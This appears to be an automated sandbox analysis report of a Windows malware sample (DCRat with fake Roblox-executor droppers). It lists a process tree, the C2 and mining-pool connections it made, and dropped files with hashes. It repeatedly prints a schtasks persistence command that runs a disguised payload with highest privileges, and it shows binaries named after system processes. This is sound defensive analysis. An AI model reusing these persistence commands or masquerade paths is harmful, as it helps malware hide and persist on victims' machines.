"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\fontdrvhost.exe

C:\winNet\fontdrvhost.exe

C:\Users\Admin\Music\xdwdAdobe Illustrator.exe

"C:\Users\Admin\Music\xdwdAdobe Illustrator.exe"

C:\Users\Default\Pictures\Registry.exe

C:\Users\Default\Pictures\Registry.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Recovery\WindowsRE\backgroundTaskHost.exe

C:\Recovery\WindowsRE\backgroundTaskHost.exe

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Program Files\Uninstall Information\SolaraBootstrapper.exe

"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe

"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Users\Default\Pictures\Registry.exe.exe

"C:\Users\Default\Pictures\Registry.exe.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\winNet\fontdrvhost.exe.exe

"C:\winNet\fontdrvhost.exe.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\Vss\Writers\Application\WmiPrvSE.exe

C:\Windows\Vss\Writers\Application\WmiPrvSE.exe

C:\Recovery\WindowsRE\Refcrt.exe

C:\Recovery\WindowsRE\Refcrt.exe

C:\DriversavessessionDlldhcp\cmd.exe

C:\DriversavessessionDlldhcp\cmd.exe

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Recovery\WindowsRE\backgroundTaskHost.exe.exe

"C:\Recovery\WindowsRE\backgroundTaskHost.exe.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Recovery\WindowsRE\csrss.exe

C:\Recovery\WindowsRE\csrss.exe

C:\DriversavessessionDlldhcp\sysmon.exe

C:\DriversavessessionDlldhcp\sysmon.exe

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Program Files\Uninstall Information\SolaraBootstrapper.exe.exe

"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe.exe

"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.22.46:443 www.nodejs.org tcp
US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 52.133.105.77.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 72.169.67.172.in-addr.arpa udp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 172.67.169.72:80 papka.top tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
FI 77.105.133.52:80 ozero.top tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
FI 77.105.133.52:80 ozero.top tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe

MD5 414b2c1de3b01b9f2cb8a3921f0cbd1f
SHA1 9eb52184bf86a64efb713d65927eb03052869abc
SHA256 185bcd14ce4b5531c75d57d2dc996cf6e69d46121a1cd83b6ffb746ccd36938f
SHA512 b47b105ece11cbc660c3a61ac1f7012fcbbaee77610ab4f4937111d224d8f6d8682bda720e0ee488c2deca5f0d8ed3a46c000eb9479c864f349758beaeeb7859

memory/2568-22-0x00007FFA562C3000-0x00007FFA562C5000-memory.dmp

memory/5044-20-0x0000000000400000-0x0000000000D8F000-memory.dmp

memory/2568-21-0x0000000000130000-0x00000000001B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Result.exe

MD5 170b43350048ed4b6fca0e50a0178621
SHA1 db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512 e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

MD5 7d4b84a8c3d14cb3d1bb864719463404
SHA1 544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA256 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512 d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

MD5 11fdce42422f8ed518fedf290f5bfc3c
SHA1 f18a4ad694af5ba50a7697b4cb66308454c555d9
SHA256 b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3
SHA512 4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

memory/5072-56-0x0000000000400000-0x0000000000CC7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

MD5 7529e4004c0fe742df146464e6aeadb0
SHA1 ae7341ee066b31de5a1a1a25851b70ced41de13f
SHA256 a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81
SHA512 d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

C:\Users\Admin\AppData\Local\Temp\solara.exe

MD5 1797c0e37f4b9dd408cbf0d7bfcb7c95
SHA1 10df695351ac6074e23a3d3b4bd31a17c10fd614
SHA256 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA512 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

memory/5100-87-0x0000000000400000-0x000000000069B000-memory.dmp

memory/3012-92-0x0000000000200000-0x00000000002CE000-memory.dmp

C:\winNet\we9fgyC144zVOkGk.vbe

MD5 aa1a085aba94a5fc38c26b79a2217336
SHA1 f847af2aec7fd56fe8734ccb51d8027b9b4e817b
SHA256 f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545
SHA512 75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

memory/3012-93-0x0000000004FF0000-0x0000000005594000-memory.dmp

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

MD5 3492e48fb2e9fb2bfc18658e3d8f88bd
SHA1 34cec8222aedc8baf774aa863a041a23971c7631
SHA256 c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e
SHA512 a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

MD5 1a3448b944b91cebda73adc5064e6286
SHA1 4f8716c6e56a675944a5f0f250947c8d45a362e1
SHA256 5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5
SHA512 b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

MD5 83a7f739f51f1acd83f143afa6ec1533
SHA1 2f653f906842f8f507d02f81550eb26a35f38acc
SHA256 5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545
SHA512 c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

MD5 9cf4017a8383ae846a908c79a28354bf
SHA1 adbe6a02b90147431e80fc38100de42d88dd765a
SHA256 bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2
SHA512 490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

memory/4084-108-0x00000000004B0000-0x0000000000634000-memory.dmp

memory/4084-109-0x0000000000E90000-0x0000000000E9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

MD5 0e4e9aa41d24221b29b19ba96c1a64d0
SHA1 231ade3d5a586c0eb4441c8dbfe9007dc26b2872
SHA256 5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d
SHA512 e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

memory/4084-113-0x0000000000E50000-0x0000000000E6C000-memory.dmp

memory/4084-117-0x0000000000E80000-0x0000000000E90000-memory.dmp

